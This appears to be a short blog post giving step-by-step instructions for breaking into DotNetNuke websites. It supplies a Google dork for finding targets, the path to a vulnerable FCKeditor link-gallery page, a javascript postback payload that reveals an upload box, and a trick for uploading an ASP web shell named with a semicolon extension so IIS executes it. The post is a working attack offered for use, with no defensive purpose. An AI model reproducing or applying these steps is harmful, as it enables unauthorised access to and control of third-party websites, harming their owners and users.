Here i am going to point out how to exploit a vuln in dnn ie dotnenuke site to gain access to a site
1) find a dotnetNuke site
2) google dork :- inurl:default.aspx
3) suppose u find the site http://siteName/default.aspx
4) go to the location http:siteName/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
5) if its vul a link gallery page will be open as shown
6)if you now paste the following javascript code into the address bar and hit enter: “javascript:__doPostBack('ctlURL$cmdUpload','')” a upload box will come into the section as shown
7)Now u can upload the img or any fileon the path which u can specify from drop down to upload a asp shell u have to rename a asp file with semi colon after asp as shown beloaw
eg : shell.asp;.jpg
9) since iis will not recognize extension after semi colon it will execute the shell as asp
No comments:
Post a Comment